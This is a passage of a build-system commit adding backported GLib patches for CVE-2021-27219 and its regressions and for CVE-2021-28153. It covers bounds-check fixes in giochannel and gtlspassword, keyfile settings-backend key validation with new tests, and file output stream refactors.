+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that
+nul-terminated strings passed to `g_io_channel_set_line_term()` can’t
+exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()`
+is due to be deprecated), but not to avoid a bug, since it’s also
+limited to `G_MAXUINT`.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c6a89d6e0..4dec20f77 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ const gchar *line_term,
+ gint length)
+ {
++ guint length_unsigned;
++
+ g_return_if_fail (channel != NULL);
+ g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */
+
+ if (line_term == NULL)
+- length = 0;
+- else if (length < 0)
+- length = strlen (line_term);
++ length_unsigned = 0;
++ else if (length >= 0)
++ length_unsigned = (guint) length;
++ else
++ {
++ /* FIXME: We’re constrained by line_term_len being a guint here */
++ gsize length_size = strlen (line_term);
++ g_return_if_fail (length_size > G_MAXUINT);
++ length_unsigned = (guint) length_size;
++ }
+
+ g_free (channel->line_term);
+- channel->line_term = line_term ? g_memdup (line_term, length) : NULL;
++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+ channel->line_term_len = length;
+ }
+
+--
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
new file mode 100644
index 0000000000..3047062f54
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
@@ -0,0 +1,36 @@
+From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001
+From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com>
+Date: Sun, 7 Feb 2021 23:32:40 +0100
+Subject: [PATCH 1/5] giochannel: Fix length_size bounds check
+
+The inverted condition is an obvious error introduced by ecdf91400e9a.
+
+Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+
+(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index 4dec20f77..c3f3102ff 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ {
+ /* FIXME: We’re constrained by line_term_len being a guint here */
+ gsize length_size = strlen (line_term);
+- g_return_if_fail (length_size > G_MAXUINT);
++ g_return_if_fail (length_size <= G_MAXUINT);
+ length_unsigned = (guint) length_size;
+ }
+
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
new file mode 100644
index 0000000000..2ba26075df
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
@@ -0,0 +1,38 @@
+From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:34:50 +0000
+Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in
+ GIOChannel struct
+
+Adding test coverage indicated that this was another bug in 0cc11f74.
+
+Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings"
+Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c3f3102ff..19bb06ba6 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+
+ g_free (channel->line_term);
+ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+- channel->line_term_len = length;
++ channel->line_term_len = length_unsigned;
+ }
+
+ /**
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
new file mode 100644
index 0000000000..2c388b4bbb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
@@ -0,0 +1,38 @@
+From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:04:48 +0000
+Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion
+
+The intention here was to assert that the length of the password fits
+in a gssize. Passwords more than half the size of virtual memory are
+probably excessive.
+
+Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords"
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index dbcec41a8..bd86a6dfe 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password,
+ {
+ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
+ gsize length_unsigned = strlen ((gchar *) value);
+- g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ g_return_if_fail (length_unsigned <= G_MAXSSIZE);
+ length = (gssize) length_unsigned;
+ }
+
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
new file mode 100644
index 0000000000..356e986fe0
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
@@ -0,0 +1,100 @@
+From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:22:39 +0000
+Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to
+ set the password
+
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit df4501316ca3903072400504a5ea76498db19538)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++
+ 1 file changed, 55 insertions(+)
+
+diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c
+index 4f0737d7e..5661e8e0d 100644
+--- a/gio/tests/tls-interaction.c
++++ b/gio/tests/tls-interaction.c
+@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction,
+ }
+
+
++/* Return a copy of @str that is allocated in a silly way, to exercise
++ * custom free-functions. The returned pointer points to a copy of @str
++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */
++static guchar *
++special_dup (const char *str)
++{
++ GString *buf = g_string_new ("BEFORE");
++ guchar *ret;
++
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, str);
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, "AFTER");
++ ret = (guchar *) g_string_free (buf, FALSE);
++ return ret + strlen ("BEFORE") + 1;
++}
++
++
++/* Free a copy of @str that was made with special_dup(), after asserting
++ * that it has not been corrupted. */
++static void
++special_free (gpointer p)
++{
++ gchar *s = p;
++ gchar *buf = s - strlen ("BEFORE") - 1;
++
++ g_assert_cmpstr (buf, ==, "BEFORE");
++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER");
++ g_free (buf);
++}
++
++
+ static GTlsInteractionResult
+ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GTlsPassword *password,
+@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GError **error)
+ {
+ TestInteraction *self;
++ const guchar *value;
++ gsize len;
+
+ g_assert (TEST_IS_INTERACTION (interaction));
+ self = TEST_INTERACTION (interaction);
+@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ g_assert (error != NULL);
+ g_assert (*error == NULL);
+
++ /* Exercise different ways to set the value */
++ g_tls_password_set_value (password, (const guchar *) "foo", 4);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "foo", 4);
++
++ g_tls_password_set_value (password, (const guchar *) "bar", -1);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "bar", 3);
++
++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baa", 4);
++
++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baz", 3);
++
+ /* Don't do this in real life. Include a null terminator for testing */
+ g_tls_password_set_value (password, (const guchar *)"the password", 13);
+ return G_TLS_INTERACTION_HANDLED;
+--
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
new file mode 100644
index 0000000000..dd43689aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
@@ -0,0 +1,49 @@
+From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:16:39 +0000
+Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group
+ is unset
+
+Fix an effective regression in commit
+7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when
+`convert_path()` is called with a `key` which contains no slashes. In
+that case, the `key` is entirely the `basename`.
+
+Prior to commit 7781a9cb, the code worked through a fluke of `i == -1`
+cancelling out with the various additions in the `g_memdup()` call, and
+effectively resulting in `g_strdup (key)`.
+
+Spotted by Guido Berhoerster.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 25b057672..861c3a661 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ }
+
+ if (basename)
+- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ {
++ if (last_slash != NULL)
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ else
++ *basename = g_strdup (key);
++ }
+
+ return TRUE;
+ }
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
new file mode 100644
index 0000000000..04503641c3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
@@ -0,0 +1,43 @@
+From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:19:30 +0000
+Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group
+ names
+
+These should never have been allowed; they will result in precondition
+failures from the `GKeyFile` later on in the code.
+
+A test will be added for this shortly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 861c3a661..de216e615 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+
+ last_slash = strrchr (key, '/');
+
++ /* Disallow empty group names or key names */
++ if (key_len == 0 ||
++ (last_slash != NULL &&
++ (*(last_slash + 1) == '\0' ||
++ last_slash == key)))
++ return FALSE;
++
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
new file mode 100644
index 0000000000..65f59287a8
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
@@ -0,0 +1,232 @@
+Backport of:
+
+From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:21:36 +0000
+Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile
+ backend
+
+This tests the two recent commits.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 169 insertions(+), 1 deletion(-)
+
+--- a/gio/tests/gsettings.c
++++ b/gio/tests/gsettings.c
+@@ -1,3 +1,4 @@
++#include <errno.h>
+ #include <stdlib.h>
+ #include <locale.h>
+ #include <libintl.h>
+@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con
+ (*b) = TRUE;
+ }
+
++typedef struct
++{
++ const gchar *path;
++ const gchar *root_group;
++ const gchar *keyfile_group;
++ const gchar *root_path;
++} KeyfileTestData;
++
+ /*
+ * Test that using a keyfile works
+ */
+@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture,
+ g_free (str);
+
+ g_settings_set (settings, "farewell", "s", "cheerio");
+-
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
+ /* When executing as root, changing the mode of the keyfile will have
+ * no effect on the writability of the settings.
+ */
+@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture,
+ g_free (keyfile_path);
+ }
+
++/*
++ * Test that using a keyfile works with a schema with no path set.
++ */
++static void
++test_keyfile_no_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ const KeyfileTestData *test_data = user_data;
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ GKeyFile *keyfile;
++ gboolean writable;
++ gchar *key = NULL;
++ GError *error = NULL;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path);
++ g_object_unref (kf_backend);
++
++ g_settings_reset (settings, "test-boolean");
++ g_assert_true (g_settings_get_boolean (settings, "test-boolean"));
++
++ writable = g_settings_is_writable (settings, "test-boolean");
++ g_assert_true (writable);
++ g_settings_set (settings, "test-boolean", "b", FALSE);
++
++ g_assert_false (g_settings_get_boolean (settings, "test-boolean"));
++
++ g_settings_delay (settings);
++ g_settings_set (settings, "test-boolean", "b", TRUE);
++ g_settings_apply (settings);
++
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL));
++
++ g_key_file_free (keyfile);
++
++ g_settings_reset (settings, "test-boolean");
++ g_settings_apply (settings);
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error));
++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND);
++ g_clear_error (&error);
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
++ /* Keys which ghost the root group name are not allowed. This can only be
++ * tested when the path is `/` as otherwise it acts as a prefix and prevents
++ * any ghosting. */
++ if (g_str_equal (test_data->path, "/"))
++ {
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++ }
++
++ g_key_file_free (keyfile);
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. */
++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys outside its root path.
++ */
++static void
++test_keyfile_outside_root_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root");
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys in the root if no root group is set.
++ */
++static void
++test_keyfile_no_root_group (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
+ /* Test that getting child schemas works
+ */
+ static void
+@@ -2844,6 +3000,14 @@ main (int argc, char *argv[])
+ gchar *override_text;
+ gchar *enums;
+ gint result;
++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" };
++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" };
++ const KeyfileTestData keyfile_test_data_long_path = {
++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/",
++ "root",
++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch",
++ "/"
++ };
+
+ /* Meson build sets this */
+ #ifdef TEST_LOCALE_PATH
+@@ -2967,6 +3131,11 @@ main (int argc, char *argv[])
+ }
+
+ g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown);
++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown);
++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown);
+ g_test_add_func ("/gsettings/child-schema", test_child_schema);
+ g_test_add_func ("/gsettings/strinfo", test_strinfo);
+ g_test_add_func ("/gsettings/enums", test_enums);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
new file mode 100644
index 0000000000..c89ca20726
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
@@ -0,0 +1,27 @@
+From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:33:38 +0000
+Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+ /* We only need read access to the original file if we are creating a backup.
+- * We also add O_CREATE to avoid a race if the file was just removed */
++ * We also add O_CREAT to avoid a race if the file was just removed */
+ if (create_backup || readable)
+ open_flags = O_RDWR | O_CREAT | O_BINARY;
+ else
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@
+From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:34:32 +0000
+Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Since a following commit is going to add a new test which references
+Gitlab, so it’s best to move the URI bases inside the test cases.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/file.c | 4 +---
+ 1 file changed, 1 insertion(+), 3 deletions(-)
+
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -685,7 +685,7 @@ test_replace_cancel (void)
+ guint count;
+ GError *error = NULL;
+
+- g_test_bug ("629301");
++ g_test_bug ("https://bugzilla.gnome.org/629301");
+
+ path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error);
+ g_assert_no_error (error);
+@@ -1784,8 +1784,6 @@ main (int argc, char *argv[])
+ {
+ g_test_init (&argc, &argv, NULL);
+
+- g_test_bug_base ("http://bugzilla.gnome.org/");
+-
+ g_test_add_func ("/file/basic", test_basic);
+ g_test_add_func ("/file/build-filename", test_build_filename);
+ g_test_add_func ("/file/parent", test_parent);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
new file mode 100644
index 0000000000..a82febd26e
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Mar 2021 16:05:55 +0000
+Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check
+
+This clarifies the code a little. It introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi
+ int res;
+ int mode;
+ int errsv;
++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);
+
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi
+ * to a backup file and rewrite the contents of the file.
+ */
+
+- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) ||
++ if (replace_destination_set ||
+ (!(original_stat.st_nlink > 1) && !is_symlink))
+ {
+ char *dirname, *tmp_filename;
+@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi
+
+ /* try to keep permissions (unless replacing) */
+
+- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) &&
++ if (!replace_destination_set &&
+ (
+ #ifdef HAVE_FCHOWN
